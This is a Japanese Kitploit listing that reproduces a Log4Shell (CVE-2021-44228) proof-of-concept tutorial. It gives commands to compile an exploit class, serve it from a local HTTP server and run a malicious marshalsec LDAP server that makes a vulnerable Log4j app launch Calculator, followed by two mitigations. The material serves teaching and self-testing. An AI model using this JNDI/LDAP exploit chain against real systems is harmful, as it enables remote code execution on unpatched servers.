Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2021-44228-PoC — CVE-2021-44228 (Log4Shell) 概念実証 | Kitploit
ツール/GitHubGitHub/sunnyvale-it/cve-2021-44228-poc
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育
GitHubsunnyvale-it/cve-2021-44228-poc

CVE-2021-44228-PoC

CVE-2021-44228 (Log4Shell) 概念実証

リポジトリを見る
8544年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2021-44228 (Log4Shell) 概念実証

Apache Log4j2 <=2.14.1 の設定、ログメッセージ、パラメータで使用される JNDI 機能は、攻撃者が制御する LDAP およびその他の JNDI 関連エンドポイントから保護されていません。 メッセージルックアップ置換が有効な場合、ログメッセージまたはログメッセージのパラメータを制御できる攻撃者は、LDAP サーバーから読み込まれた任意のコードを実行できます。

この脆弱性の仕組みをご理解いただくために、シンプルかつ実際に動作する概念実証(PoC)を備えたリポジトリを用意しました。

前提条件

ローカルに以下がインストールされていること:

  • Git
  • JDK 11
  • Maven
  • Python

現時点では、任意のコードは macOS または Windows 上で Calculator アプリケーションを起動します。そのため、この PoC がサポートする OS はこれら 2 つだけです。

免責事項

すべての情報とコードは、教育目的および/またはこの脆弱性に関して自身のシステムをテストする目的でのみ提供されます。

攻撃手法

この PoC は、下の図に示されている攻撃手法を再現したものです(クレジット: GovCERT.ch)。ただし、脆弱なサーバーは簡略化のため単純な Java クラスになっています。この脆弱性はさまざまな方法でトリガーされる可能性があることを理解することが重要です。以下で説明するのはそのうちの 1 つにすぎません。

PoC の実行方法

このリポジトリをクローンします

root@kitploit:~
terminal1 $ git clone https://github.com/sunnyvale-it/CVE-2021-44228-PoC.git

エクスプロイトをコンパイルします(JDK 11 を使用)

root@kitploit:~
terminal1 $ javac Exploit.java

エクスプロイトを配信する HTTP サーバーを起動します

root@kitploit:~
terminal1 $ python -m SimpleHTTPServer 8888 --directory .

悪意のある LDAPRefServer を起動します(https://github.com/mbechler/marshalsec に感謝)

root@kitploit:~
terminal2 $ java -cp tools/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8888/#Exploit"

脆弱なアプリケーション(log4j 2.14.1 を含む)を起動します

root@kitploit:~
terminal3 $ mvn package && mvn exec:exec

すべてが正常に動作した場合、Calculator アプリケーション(任意のコード実行)が表示されるはずです。

簡単な緩和策(Log4J バージョン 2.10.0 から 2.14.1 までで有効)

LOG4J_FORMAT_MSG_NO_LOOKUPS 環境変数を true に設定する

root@kitploit:~
terminal3 $ export LOG4J_FORMAT_MSG_NO_LOOKUPS=true 
root@kitploit:~
terminal3 $ mvn package && mvn exec:exec

この場合、Calculator は表示されなくなります。

log4j2.formatMsgNoLookups システムプロパティを true に設定してアプリケーションを実行する

root@kitploit:~
terminal3 $ mvn package && mvn exec:exec -Dlog4j2.formatMsgNoLookups=true

この場合、Calculator は表示されなくなります。

ツールをダウンロード